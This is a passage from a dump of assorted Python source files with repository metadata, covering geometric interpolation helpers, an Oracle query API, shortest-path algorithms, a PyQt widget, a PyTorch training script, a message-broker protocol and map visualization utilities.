x2, y2):\r\n\t\th = sqrt((x2-x1)**2 + (y2-y1)**2)\r\n\t\treturn h\r\n\t\r\n\tdef hgt_calc(self, x0, y0, n_p):\r\n\t\th = zeros( (len(self.data1)), dtype = float)\r\n\t\tj = 0\r\n\t\tfor i in xrange(len(self.data1)):\r\n\t\t\th[j] = self.calc_hgt(x0, y0, self.data1[i], self.data2[i])\r\n\t\t\tj = j+1\r\n\t\th = argsort(h)\r\n\t\th_n = []\r\n\t\tfor i in xrange(n_p):\r\n\t\t\th_n.append(h[i+1])\r\n\t\th_n.sort()\r\n\t\treturn h_n\r\n\t\r\n\tdef get_weights_idw(self, x_center, y_center, c):\r\n\t\tw1 = zeros( (len(self.data1)), dtype = float)\r\n\t\te_h = self.calc_e_h(x_center, y_center, c)\r\n\t\tfor i in xrange(len(self.data1)):\r\n\t\t\th = self.calc_h(x_center, y_center, i, c)\r\n\t\t\tw1[i] = h/e_h\r\n\t\treturn w1\r\n\t\r\n\tdef get_segment_x_middle(self, x1, x2):\r\n\t\tx = 0.0\r\n\t\tx = (x1 + x2)/2\r\n\t\treturn x\r\n\t\r\n\tdef get_segment_y_middle(self, y1, y2):\r\n\t\ty = 0.0\r\n\t\ty = (y1 + y2)/2\r\n\t\treturn y\r\n\t\r\ndef get_rect(array_x, array_y):\r\n\tmin_max = zeros( (4), dtype = float)\r\n\tmin_max[0] = min(array_x) #x(min)\r\n\tmin_max[1] = min(array_y) #y(min)\r\n\tmin_max[2] = max(array_x) #x(max)\r\n\tmin_max[3] = max(array_y) #y(max)\r\n\t\r\n\tfor i in xrange(2):\r\n\t\tmin_max[i] = min_max[i] - 10\r\n\t\tmin_max[i+2] = min_max[i+2] + 10\r\n\t\r\n\t#print min_max\r\n\t\r\n\t# if ((min_max[2]-min_max[0])>(min_max[3]-min_max[1])):\r\n\t\t# min_max[3] = min_max[2] - min_max[0] + min_max[1]\r\n\t# elif ((min_max[2]-min_max[0])<(min_max[3]-min_max[1])):\r\n\t\t# min_max[2] = min_max[3] - min_max[1] + min_max[0]\r\n\treturn min_max\r\n\t\r\n\t\r\ndef stand_weight(w, n):\r\n\tsum = 0.0\r\n\tfor i in xrange(len(w)):\r\n\t\tsum = sum + w[i]\r\n\tfor i in xrange(len(w)):\r\n\t\tw[i] = (w[i]*n)/sum\r\n\treturn w\r\n# n- kol-vo izvestnih tochek\r\n\r\n\r\ndef s_polygon(x, y):\r\n\ts = 0.0\r\n\tn = len(x)\r\n\tfor i in xrange(n):\r\n\t\tif (i == 0):\r\n\t\t\ts = s + x[i]*(y[n-1] - y[i+1])\r\n\t\telif (i == n-1):\r\n\t\t\ts = s + x[i]*(y[i-1] - y[0])\r\n\t\telse:\r\n\t\t\ts = s + x[i]*(y[i-1] - y[i+1])\r\n\ts = 0.5 * abs(s)\r\n\treturn s\r\n\r\n\t\r\ndef s_polygon_1(x, y):\r\n\ts = 0.0\r\n\tn = 
len(x)\r\n\tfor i in xrange(n):\r\n\t\tif (i == n-1):\r\n\t\t\ts = s + (x[i]*y[0])-(y[i]*x[0])\r\n\t\telse:\r\n\t\t\ts = s + (x[i]*y[i+1])-(y[i]*x[i+1])\r\n\ts = 0.5 * abs(s)\r\n\treturn s\r\n\t\r\n","repo_name":"hpgl/hpgl","sub_path":"src/sample-scripts/solved_problems/shared/decl_grid.py","file_name":"decl_grid.py","file_ext":"py","file_size_in_byte":4626,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"37"} +{"seq_id":"6515382635","text":"import cx_Oracle\nimport json\nimport collections\nfrom .readConf import ReadConf\nfrom .login_Postgres import Login_Postgres\n\n\nclass QryAllowanceByEmp:\n def __init__(self):\n pass\n\n def get_data(self, user, password, begin_date, end_date, emp_no):\n ora = ReadConf().ora()\n login = Login_Postgres(user=user, password=password)\n is_login = json.loads(login.login().decode('utf-8'))\n if is_login['login'] == 'True' and ('|csdplan|hrconnect|hr|'.find(user) > 0):\n conn = None\n data = {}\n mmyyyy = end_date[3:]\n try:\n dsn_tns = cx_Oracle.makedsn(ora['server'], ora['port'], ora['service'])\n conn = cx_Oracle.connect(ora['user'], ora['password'], dsn_tns\n , encoding=\"UTF-8\")\n conn.autocommit = False\n cursor = conn.cursor()\n cursor2 = conn.cursor()\n cursor3 = conn.cursor()\n params = {'begin_date': begin_date, 'end_date': end_date}\n cursor.callproc('tonkm_package.QRY_ALLOWANCE_BY_EMP', [emp_no, mmyyyy])\n qryFuelUsed = ReadConf().qryFuelUsed()['Query']\n cursor.execute(qryFuelUsed, params)\n row = cursor.fetchone()\n ngvUsed = row[0]\n dieselUsed = row[1]\n qryStr = ReadConf().qryAllowanceByEmp1()['Query']\n cursor.execute(qryStr, params)\n data = collections.OrderedDict()\n dn = []\n t = collections.OrderedDict()\n for row in cursor:\n t = collections.OrderedDict()\n t['EMP_NO'] = row[0]\n t['WORK_DATE'] = begin_date + ' - ' + end_date\n t['DRIVER'] = row[1]\n t['TEL'] = row[2]\n t['NATIONAL_NO'] = row[3]\n t['TOTAL_DN'] = row[4]\n t['KM_ADJ_LOAD'] = row[5]\n t['KM_ADJ_NOLOAD'] = row[6]\n t['TON_KM_AMT'] = row[7]\n t['FUEL_NGV'] = row[8]\n t['FUEL_DIESEL'] = row[9]\n t['NGV_USED'] = ngvUsed\n t['DIESEL_USED'] = dieselUsed\n t['MULTIDROP'] = row[10]\n t['DIFFICULTY'] = row[11]\n data['TOTAL'] = t\n \"\"\" -------------Loop 2 summary By DN ------------------------ \"\"\"\n qryStr2 = ReadConf().qryAllowanceByEmp2()['Query']\n cursor2.execute(qryStr2, params)\n adj_distance = '-'\n for row2 in cursor2:\n t2 = collections.OrderedDict()\n t2['DN_NO'] = row2[0]\n t2['DN_DATE'] = row2[1]\n t2['TRUCK_NO'] = row2[2]\n t2['ENGINE_TYPE'] = row2[3]\n t2['DESTINATION'] = row2[4]\n t2['TON_KM_AMT'] = row2[5]\n t2['FUEL_NGV'] = row2[6]\n t2['FUEL_DIESEL'] = row2[7]\n t2['FUEL_USED'] = row2[10]\n t2['MULTIDROP'] = row2[8]\n t2['DIFFICULTY'] = row2[9]\n \"\"\"--------------Loop 3 แสดง DN detail ------------\"\"\"\n qryStr3 = ReadConf().qryAllowanceByEmp3()['Query']\n qryStr3 = qryStr3.replace('{{dn_no}}', row2[0])\n cursor3.execute(qryStr3, params)\n dn_detail = []\n for row3 in cursor3:\n t3 = collections.OrderedDict()\n t3['DN_ORDER'] = row3[0]\n t3['PRODUCT'] = row3[1]\n t3['START_PLACE'] = row3[2]\n t3['TO_PLACE'] = row3[3]\n t3['WEIGHT'] = row3[4]\n t3['KM_ADJ'] = row3[5]\n t3['TON_KM_AMT'] = row3[6]\n t3['FUEL_QUAN'] = row3[7]\n t3['FUEL_UNIT'] = row3[8]\n t3['MULTIDROP'] = row3[9]\n t3['DIFFICULTY'] = row3[10]\n t3['TRANS_REMARK'] = row3[11]\n t3['REMARK'] = row3[12]\n t3['ADJ_DISTANCE'] = row3[13]\n if row3[13] == 'adj_distance':\n adj_distance='รอปรับปรุงระยะทาง'\n dn_detail.append(t3)\n 
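# For orientation, the payload assembled in this method nests roughly as follows\n                    # (a sketch from the keys assigned above, with placeholder values rather than\n                    # literal API output):\n                    #   {\"TOTAL\": {\"EMP_NO\": ..., \"TON_KM_AMT\": ..., ...},\n                    #    \"DN\": [{\"DN_NO\": ..., \"ROUTE\": [{\"DN_ORDER\": ...}, ...]}, ...]}\n                    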
t2['ADJ_DISTANCE'] = adj_distance\n                    t2['ROUTE'] = dn_detail\n                    dn.append(t2)\n                data['DN'] = dn\n                cursor.close()\n                cursor2.close()\n                cursor3.close()\n                return json.dumps(data, indent=\" \", ensure_ascii=False).encode('utf-8')\n            except cx_Oracle.DatabaseError as e:\n                # print(e.args[0].message)\n                data['driver'] = e.args[0].message\n                data['truck_no'] = 'ไม่พบข้อมูล'\n                data['dn_chain'] = 'ไม่พบข้อมูล'\n                data['source_point'] = 'ไม่พบข้อมูล'\n                data['receiver'] = 'ไม่พบข้อมูล'\n                data['ton_km'] = 0\n                data['fuel_quan'] = 0\n                return json.dumps(data, indent=\" \", ensure_ascii=False).encode('utf-8')\n            finally:\n                if conn is not None:\n                    conn.commit()\n                    conn.close()\n        else:\n            return json.dumps({'login': 'สิทธิการเข้าถึงข้อมูลถูกจำกัด'}).encode('utf-8')\n\n","repo_name":"sivaroj/svl-api-falcon-freeze","sub_path":"appPackage/QryAllowanceByEmp.py","file_name":"QryAllowanceByEmp.py","file_ext":"py","file_size_in_byte":5768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36314422531","text":"# -----------------------------------------------------------------------------------------------------------------------\n\n# Dijkstra's algorithm:\n# O(m + n**2) with this simple linear-scan node selection\n# Does not work if negative weights are present\n# -----------------------------------------------------------------------------------------------------------------------\n\n\nclass Graph:\n    def __init__(self,num_nodes, edges, weighted=False):\n        self.num_nodes = num_nodes\n        self.weighted = weighted\n        self.data = [[] for _ in range(self.num_nodes)]\n\n        for edge in edges:\n            n1, n2, w = edge\n            self.data[n1].append((n2, w))\n            self.data[n2].append((n1, w))\n\n    def __repr__(self):\n        result = \"\"\n\n        for i, v in enumerate(self.data):\n            result += f\"{i} -> {v}\"\n\n        return result\n\n    def __str__(self):\n        return self.__repr__()\n\n\n    def update_distance(self, distance, current, parent):\n        neighbours = self.data[current]\n\n        for edge, weight in neighbours:\n            if distance[current] + weight < distance[edge]:\n                distance[edge] = distance[current] + weight\n                parent[edge] = current\n\n\n    def pick_next_node(self, visited, distance):\n        min_dist = float('inf')\n        min_node = None\n\n        for i in range(len(distance)):\n            if not visited[i] and distance[i] < min_dist:\n                min_node = i\n                min_dist = distance[i]\n\n        return min_node\n\n    \n    def shortest_path(self, start, target):\n        visited = [False] * self.num_nodes\n        distance = [float('inf')] * self.num_nodes\n        parent = [None] * self.num_nodes\n\n        queue = []\n        queue.append(start)\n        distance[start] = 0\n        visited[start] = True\n        idx = 0\n\n        while idx < len(queue):\n            current = queue[idx]\n            visited[current] = True\n            idx += 1\n\n            self.update_distance(distance, current, parent)\n\n            next_node = self.pick_next_node(visited, distance)\n            if next_node is not None:  # node 0 is falsy, so an explicit None check is needed here\n                queue.append(next_node)\n\n        return distance[target], parent \n\n\n# num_nodes7 = 6\n# edges7 = [(0, 1, 4), (0, 2, 2), (1, 2, 5), (1, 3, 10), (2, 4, 3), (4, 3, 4), (3, 5, 11)]\n\n\n# graph7 = Graph(num_nodes7, edges7,weighted=True)\n# print(graph7)\n\n# print(graph7.shortest_path( 0, 5))\n\n\n# -----------------------------------------------------------------------------------------------------------------------\n\n# Bellman-Ford's algorithm:\n# O(E*V)\n# Works even when negative weights are present\n# -----------------------------------------------------------------------------------------------------------------------\n\n\ndef bellman_ford(edges, num_nodes, start):\n    distance = [float('inf')] * num_nodes\n    distance[start] = 0\n\n    for i in range(num_nodes):\n        for u,v,w 
in edges:\n if distance[v] > distance[u] + w:\n distance[v] = distance[u] + w\n\n for u,v,w in edges:\n if distance[v] > distance[u] + w:\n return False, distance\n\n return True, distance\n\n\nnum_nodes6 = 5\nedges6 = [(0, 1, 4), (0, 2, 2), (1, 3, 2), (1, 4, 3), (1, 2, 3), (2, 1, 1), (2, 4, 5), (2, 3, 4), (4, 3, -5)]\n\n\n# graph7 = Graph(num_nodes7, edges7, directed = True, weighted=True)\n# print(graph7)\n\nprint(bellman_ford(edges6, num_nodes6, 0))","repo_name":"akashkumarbtc/Data-Structures-and-Algo","sub_path":"graphs/practise.py","file_name":"practise.py","file_ext":"py","file_size_in_byte":3308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37420563921","text":"from PyQt6.QtWidgets import QWidget, QHBoxLayout\nfrom PyQt6.QtCore import Qt\n\nfrom view.values.EditWidgets import EditFloatSpinBox\n\nfrom msg.Messages import MsgOnLogicDataEdited\nfrom msg.MessageSystem import SendMessage\n\nclass EditFloatValue(QWidget):\n def __init__(self, value):\n super().__init__()\n\n self._val = value\n\n self._rootLayout = QHBoxLayout()\n\n self._floatSpinBox = EditFloatSpinBox()\n self._floatSpinBox.valueChanged.connect(self._signal_floatSpinBox_valueChanged)\n self._rootLayout.addWidget(self._floatSpinBox)\n\n self._rootLayout.setContentsMargins(1, 1, 1, 1)\n self.setLayout(self._rootLayout)\n\n self._pull()\n\n def _signal_floatSpinBox_valueChanged(self, newValue):\n self._push(newValue)\n SendMessage(MsgOnLogicDataEdited(self._val))\n\n def _push(self, data):\n self._val.setVal(data)\n\n def _pull(self):\n data = self._val.getVal()\n self._floatSpinBox.setValue(data)","repo_name":"lastcolour/GamePractice","sub_path":"Sources/Editor/App/view/values/EditFloatValue.py","file_name":"EditFloatValue.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"74258594026","text":"\nimport torch\nimport numpy as np\nfrom torch import optim\nimport torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader, dataloader\nfrom torch.utils.data import random_split\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom torch.optim import lr_scheduler\nimport argparse\nimport wandb\nfrom model import transition_model, transition_model_linear, transition_model_residual, VoltageNet\n\nNUM_EPOCHS = 2000\nLR = 0.001\nSAVE_INTERVAL = 10\nBATCH_SIZE = 1024\nHIDDEN_DIM = 512\n\nclass TransitionDataset(Dataset):\n\n def __init__(self, data):\n self.state = torch.from_numpy(data['state']).to(torch.float32)\n self.q = torch.from_numpy(data['q']).to(torch.float32)\n self.res_v = torch.from_numpy(data['res_v']).to(torch.float32)\n\n def __getitem__(self, index):\n data = torch.cat((self.state[index],self.q[index]),dim=0)\n return data, self.res_v[index]\n def __len__(self):\n return self.state.shape[0]\n\n\ndef get_args():\n parser = argparse.ArgumentParser(description=\"Train rl agent.\")\n parser.add_argument(\"--name\", type=str, nargs=\"?\", help=\"Please input the valid name of an environment scenario.\")\n parser.add_argument(\"--dataset\", type=str, nargs=\"?\")\n parser.add_argument(\"--save-path\", type=str, nargs=\"?\", default=\"./\", help=\"Please enter the directory of saving model.\")\n parser.add_argument(\"--wandb\", action='store_true')\n args = parser.parse_args()\n args.num_epochs = NUM_EPOCHS\n args.lr = LR\n args.save_interval = SAVE_INTERVAL\n args.batch_size = BATCH_SIZE\n args.hidden_dim = HIDDEN_DIM\n 
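# A hypothetical invocation, for reference (the run name and dataset path are made up):\n    #   python train_transition.py --name run1 --dataset ./transitions.npy --wandb\n    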
return args\n\nif __name__==\"__main__\":\n args = get_args()\n if args.wandb:\n wandb.init(\n project='mapdn_cmdp_transition_model',\n entity=\"chelly\",\n name=args.name,\n group='_'.join(args.name.split('_')[:-1]),\n save_code=True\n )\n wandb.config.update(args)\n wandb.run.log_code('.')\n\n _data = np.load(args.dataset,allow_pickle=True).item()\n dataset = TransitionDataset(_data)\n len_train = int(len(dataset) * 0.8)\n len_val = len(dataset) - len_train\n train_dataset, valid_dataset = random_split(\n dataset=dataset,\n lengths=[len_train, len_val],\n generator=torch.Generator().manual_seed(0)\n )\n train_dataloader = DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True, pin_memory=True)\n valid_dataloader = DataLoader(valid_dataset, batch_size=args.batch_size, shuffle=False, pin_memory=True)\n\n # model=transition_model().cuda()\n e_data, e_label = dataset[0]\n input_dim = e_data.shape[-1]\n output_dim = e_label.shape[-1]\n print(\"input_dim = {} output_dim = {}\".format(input_dim, output_dim))\n model=transition_model_residual(input_dim, output_dim, args.hidden_dim).cuda()\n # model = VoltageNet(input_dim, output_dim, args.hidden_dim).cuda()\n\n loss_func=nn.MSELoss()\n optm=torch.optim.Adam(model.parameters(),args.lr)\n scheduler = lr_scheduler.StepLR(optm, step_size=100, gamma=0.8)\n train_epochs_loss = []\n valid_epochs_loss = []\n # acc=acc_func()\n for epoch in range(args.num_epochs):\n train_loss = []\n scheduler.step()\n for idx,(data_x, data_y) in enumerate(train_dataloader,0):\n data_x = data_x.cuda()\n data_y = data_y.cuda()\n outputs = model(data_x)\n optm.zero_grad()\n loss = loss_func(data_y,outputs)\n loss.backward()\n optm.step()\n train_loss.append(loss.item())\n # train_loss.append(loss.item())\n if idx%(len(train_dataloader)//2)==0:\n print(\"epoch={}/{},{}/{}of train, loss={}\".format(\n epoch, NUM_EPOCHS, idx, len(train_dataloader),loss.item()))\n if args.wandb:\n wandb.log({\"train_l2_loss\": np.average(train_loss)},epoch)\n train_epochs_loss.append(np.average(train_loss))\n\n #=====================valid============================\n\n valid_loss = []\n with torch.no_grad():\n for idx,(data_x,data_y) in enumerate(valid_dataloader,0):\n data_x = data_x.cuda()\n data_y = data_y.cuda()\n outputs = model(data_x)\n loss = torch.mean(torch.abs(outputs - data_y))\n valid_loss.append(loss.item())\n print(\"val epoch = {} : {}\".format(epoch,np.average(valid_loss)))\n if args.wandb:\n wandb.log({\"val_l1_loss\": np.average(valid_loss)},epoch)\n if epoch == 0 or np.average(valid_loss) < np.min(valid_epochs_loss):\n path = args.save_path + \"/\"+args.name+\"_best_model\"\n print(\"SAVE best model to {}\".format(path))\n torch.save(model.state_dict(), path)\n valid_epochs_loss.append(np.average(valid_loss))\n\n # if epoch % args.save_interval ==0 :\n # # path = args.scenario + '.res_model{}'.format(epoch)\n # path = args.save_path + \"/res_model_h={}_{}\".format(args.hidden_dim,epoch)\n # print(\"SAVE model to {}\".format(path))\n # torch.save(model.state_dict(), path)\n\n # fig = plt.figure()\n # plt.plot(np.arange(len(train_epochs_loss)), train_epochs_loss)\n # plt.xlabel(\"epoch\")\n # plt.title(\"train_loss\")\n # fig.savefig(args.save_path+\"/\"+args.name+\"_train_loss.png\".format(args.hidden_dim))\n # plt.close()\n\n # fig = plt.figure()\n # plt.plot(np.arange(len(valid_epochs_loss)), valid_epochs_loss)\n # plt.xlabel(\"epoch\")\n # plt.title(\"valid_loss\")\n # fig.savefig(args.save_path+\"/\"+args.name+\"_valid_loss.png\".format(args.hidden_dim))\n # 
plt.close()\n\n\n\n print(\"Best model : {}\".format(np.min(valid_epochs_loss)))","repo_name":"cjdjr/CMDP4PDN","sub_path":"transition/train_transition.py","file_name":"train_transition.py","file_ext":"py","file_size_in_byte":5789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69978119787","text":"from src.protocols.json_protocol import Json_P\r\nfrom src.protocols.pickle_protocol import Pickle_P\r\nfrom src.protocols.xml_protocol import Xml_P\r\nimport json\r\nimport pickle\r\nimport xml.etree.ElementTree as xml\r\nimport socket\r\n\r\nfrom src.protocols.Serializer import Serializer\r\n\r\nclass Message:\r\n #Message Type.\r\n\r\n def __str__(self):\r\n if self.serialize == 0:\r\n return json.dumps(self.getMessage())\r\n elif self.serialize == 1:\r\n return pickle.dumps(self.getMessage())\r\n \r\n def getMessage(self):\r\n return self.message\r\n \r\nclass SubscribeMessage(Message):\r\n #Message to join a topic\r\n def __init__(self, command, topic, tipo, serialize):\r\n self.serialize = serialize\r\n self.message = {\"command\":command}\r\n self.message[\"topic\"] = topic\r\n self.message[\"type\"] = tipo\r\n self.message[\"serialize\"] = serialize\r\n\r\nclass UnsubscribeMessage(Message):\r\n #Message to unjoin a topic\r\n def __init__(self, command, tipo, serialize, topic):\r\n self.serialize = serialize\r\n self.message = {\"command\":command}\r\n self.message[\"type\"] = tipo\r\n self.message[\"serialize\"] = serialize\r\n self.message[\"topic\"] = topic\r\n \r\nclass TextMessage(Message):\r\n #Message to chat with other clients.\r\n def __init__(self, command, message, topic, tipo, serialize):\r\n self.serialize = serialize\r\n self.message = {\"command\":command}\r\n self.message[\"value\"] = message\r\n self.message[\"topic\"] = topic\r\n self.message[\"type\"] = tipo\r\n self.message[\"serialize\"] = serialize\r\n\r\nclass CDProto:\r\n @classmethod\r\n def subscribe(cls, topic: str, tipo, serialize) -> SubscribeMessage:\r\n # Creates a JoinMessage object and returns object\r\n return SubscribeMessage(\"subscribe\", topic, tipo, serialize)\r\n \r\n @classmethod\r\n def unsubscribe(cls, tipo, serialize, topic) -> UnsubscribeMessage:\r\n # Create a UnsubscribeMessage object and returns object \r\n return UnsubscribeMessage(\"unsubscribe\", tipo, serialize, topic)\r\n\r\n @classmethod\r\n def message(cls, value: str, topic: str, tipo: str,serialize) -> TextMessage:\r\n # Creates a TextMessage object and returns object\r\n return TextMessage(\"value\", value, topic, tipo, serialize)\r\n \r\n @classmethod\r\n def send_msg(cls, connection: socket, msg: Message, serialize):\r\n # Choose format\r\n if serialize == Serializer.JSON.value:\r\n Json_P.send_msg(connection, msg)\r\n elif serialize == Serializer.PICKLE.value:\r\n Pickle_P.send_msg(connection, msg)\r\n else:\r\n Xml_P.send_msg(connection, msg)\r\n\r\n @classmethod\r\n def recv_msg(cls, connection: socket) -> Message:\r\n serialize = int.from_bytes(connection.recv(1), 'big')\r\n if serialize == Serializer.JSON.value:\r\n message = Json_P.recv_msg(connection)\r\n elif serialize == Serializer.PICKLE.value:\r\n message = Pickle_P.recv_msg(connection)\r\n else:\r\n message = Xml_P.recv_msg(connection)\r\n\r\n \r\n \r\n if message == None:\r\n return None\r\n\r\n # selecting message type\r\n if message[\"command\"] == \"subscribe\":\r\n return CDProto.subscribe(message[\"topic\"], message[\"type\"], message[\"serialize\"])\r\n\r\n if message[\"command\"] == 
\"unsubscribe\":\r\n return CDProto.unsubscribe(message[\"type\"], message[\"serialize\"], message[\"topic\"])\r\n \r\n elif message[\"command\"] == \"value\":\r\n return CDProto.message(message[\"value\"], message[\"topic\"], message[\"type\"], message[\"serialize\"])\r\n","repo_name":"fungame2270/Message_broker","sub_path":"src/protocol.py","file_name":"protocol.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6679677079","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('Administrativo', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Reserva',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('Data_da_Reserva', models.DateTimeField()),\n ('Uso_Internet', models.CharField(max_length=1)),\n ('Laboratorio', models.OneToOneField(to='Administrativo.Laboratorio')),\n ('Pacotes', models.ManyToManyField(to='Administrativo.PacoteDeSoftware')),\n ('Tipo_Aula', models.ForeignKey(to='Administrativo.Aula')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","repo_name":"eliomarsantana/SRLab","sub_path":"Usuario/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41334906663","text":"#! /usr/bin/python3\nimport svar\nimport json\nimport argparse\nimport time\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-gmap\",default=\"./map.gmap\",help=\"The input gmap file\")\nparser.add_argument(\"-geojson\",default='matching_graph.json',help=\"The output json file representing matches\")\n \nargs = parser.parse_args()\n\n# generate geojson from gmap\nsvar_gmap=svar.load('svar_gmap')\nqglopm =svar.load('svar_qglopm')\n\ngmap=svar_gmap.load(args.gmap)\nframes=gmap.getFrames()\n\nfeatures=[]\n\n# plot frame viewports\ncamera=frames[0].getCamera()\nfor fr in frames:\n tl=qglopm.from_pixel_to_lla(fr,(0,0))\n tr=qglopm.from_pixel_to_lla(fr,(camera[0],0))\n br=qglopm.from_pixel_to_lla(fr,(camera[0],camera[1]))\n bl=qglopm.from_pixel_to_lla(fr,(0,camera[1]))\n coordinates=[[tl.y,tl.x],[tr.y,tr.x],[br.y,br.x],[bl.y,bl.x]]\n geometry={\"type\": \"Polygon\",\"coordinates\":[coordinates]}\n feature={\"type\": \"Feature\",\"properties\": {},\"geometry\":geometry}\n features.append(feature)\n\n# plot matching graph\nfor fr in frames:\n child_center=qglopm.from_pixel_to_lla(fr,(camera[0]/2,camera[1]/2))\n parents=fr.getParents()\n for parent in parents:\n parent_center=qglopm.from_pixel_to_lla(gmap.getFrame(parent['id']),(camera[0]/2,camera[1]/2))\n coordinates=[[parent_center.y,parent_center.x],[child_center.y,child_center.x]]\n geometry={\"type\": \"LineString\",\"coordinates\":coordinates}\n feature={\"type\": \"Feature\",\"properties\": {'stroke':\"#02f740\"},\"geometry\":geometry}\n features.append(feature)\n\n# plot frame centers\nfor fr in frames:\n child_center=qglopm.from_pixel_to_lla(fr,(camera[0]/2,camera[1]/2))\n geometry={\"type\": \"Point\",\"coordinates\":[child_center.y,child_center.x]}\n feature={\"type\": \"Feature\",\"properties\": {\"icon\":\"frame_center.png\"},\"geometry\":geometry}\n 
features.append(feature)\n\ngeojson={\"type\":\"FeatureCollection\",\"features\":features}\n\nopen(args.geojson,'w').write(json.dumps(geojson,indent=2))\n\n# vis through qglopm plugin\nqapp=qglopm.QApplication()\n\nvis2d= qglopm.Visualizer2D({})\nvis2d.show()\ngraph_layer=vis2d.addLayer(\"graph\",{\"type\":\"geojson\",\"content\":geojson})\nchild_center=qglopm.from_pixel_to_lla(fr,(camera[0]/2,camera[1]/2))\nvis2d.setHomePOS([child_center.y,child_center.x,0])\nvis2d.goHome()\n\nwhile True:\n qapp.processEvents()\n time.sleep(0.01)\n\n","repo_name":"zdzhaoyong/highstitch","sub_path":"python/matching_graph.py","file_name":"matching_graph.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"37"} +{"seq_id":"38517037669","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 28 21:03:05 2020\n\n@author: zijun.cui\n\"\"\"\n\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn.utils.extmath import cartesian\nfrom scipy.optimize import fsolve\nfrom random import seed\nfrom random import random\nfrom random import randint\n\ndef count_weights(states_arr, dag):\n num_nodes = len(states_arr)\n num_weights = np.zeros(num_nodes)\n for i in range(num_nodes):\n num_states = states_arr[i]\n if num_states == 2:\n num_weights[i] = sum(dag[:,i]) + 1\n else:\n num_weights[i] = num_states*(sum(dag[:,i]) + 1)\n \n return np.sum(num_weights), num_weights\n\ndef get_constraints(load_constraints): #multi-states nodes \n Constraints = []\n num_constraints = load_constraints.shape[0]\n\n num_strict = 0\n for i in range(num_constraints):\n # target set\n orig_set = load_constraints[i,0]\n num_t = orig_set.shape[0]\n t_condi = []\n for j in range(num_t):\n t_condi.append([orig_set[j][0], orig_set[j][1]])\n \n # condition set\n orig_set = load_constraints[i,1]\n num_c = orig_set.shape[0]\n c_condi = []\n for j in range(num_c):\n if orig_set[j][0] == 18:\n c_condi.append([0, orig_set[j][1]-1]) # node 0 for expression with expression 0-5\n else:\n c_condi.append([orig_set[j][0], orig_set[j][1]])\n \n # \n state = load_constraints[i,2][0]\n if state == 'strict bigger' or state == 'strict bigger-product':\n num_strict = num_strict + 1\n \n elif state == 'strict smaller' or state == 'strict smaller-product':\n num_strict = num_strict + 1\n #\n const = load_constraints[i,3]\n if const.shape[1] == 1: # value as constraint\n prob = load_constraints[i,3]\n Constraints.append([t_condi,c_condi,state,prob[0,0]])\n else:\n num_cc = const.shape[0]\n cc_condi = []\n for j in range(num_cc):\n cc_condi.append([const[j][0], const[j][1]])\n Constraints.append([t_condi, c_condi, state, cc_condi])\n \n \n return Constraints, num_strict\n\n\ndef arrange_config_v2(config, DAG, states_arr):\n num_nodes = np.shape(DAG)[0]\n _, num_weights = count_weights(states_arr, DAG)\n num_config = np.shape(config)[0]\n \n num_weights = num_weights.astype(int)\n states_arr = states_arr.astype(int)\n \n parent_config = np.zeros([np.sum(states_arr), np.sum(num_weights), num_config])\n DAG = DAG + np.identity(num_nodes)\n \n for i in range(num_nodes):\n w_start_idx = np.sum(num_weights[0:i])\n w_end_idx = np.sum(num_weights[0:i+1])\n parent_set = np.nonzero(DAG[:,i])[0]\n if i == 0:\n pos = 0\n else:\n pos = np.sum(states_arr[0:i])\n \n if len(parent_set) != 0:\n if states_arr[i] == 2:\n for j in range(num_config):\n# parent_config[pos+1, w_start_idx, j] = 1\n temp = config[j, parent_set]\n temp[i] = 0\n parent_config[pos+1, 
w_start_idx:w_end_idx, j] = temp #config[j, parent_set]\n else: # multi-states\n for j in range(num_config):\n temp = config[j, parent_set]\n temp[i] = 0\n ssize = (num_weights[i]/states_arr[i]).astype(int)\n for k in range(states_arr[i]):\n sidx = w_start_idx + k*ssize\n eidx = w_start_idx + (k+1)*ssize\n parent_config[pos+k, sidx:eidx, j] = temp\n else:\n if states_arr[i] == 2:\n for j in range(num_config):\n parent_config[pos+1, w_start_idx:w_end_idx, j] = 0 #node itself\n else:\n for j in range(num_config):\n for k in range(states_arr[i]):\n sidx = w_start_idx + k\n eidx = w_start_idx + k + 1\n parent_config[pos+k, sidx:eidx, j] = 0\n \n return parent_config\n \ndef complete_config(incomplete_config, states_arr):\n num_nodes = len(states_arr)\n \n idx = np.where(np.array(incomplete_config)==-999)[0]\n idx_complete = np.where(np.array(incomplete_config)!=-999)[0]\n \n num = len(idx)\n arr = []\n for i in range(num):\n arr.append(np.arange(states_arr[idx[i]]))\n \n config = cartesian(arr)\n num_config = np.shape(config)[0]\n \n complete_config = np.zeros([num_config, num_nodes])\n complete_config[:, idx] = config\n incomplete_config = np.array(incomplete_config)\n complete_config[:, idx_complete] = np.tile(incomplete_config[idx_complete], (num_config,1))\n \n return complete_config\n\n\ndef list_configuration(states_arr, dag):\n num_nodes = 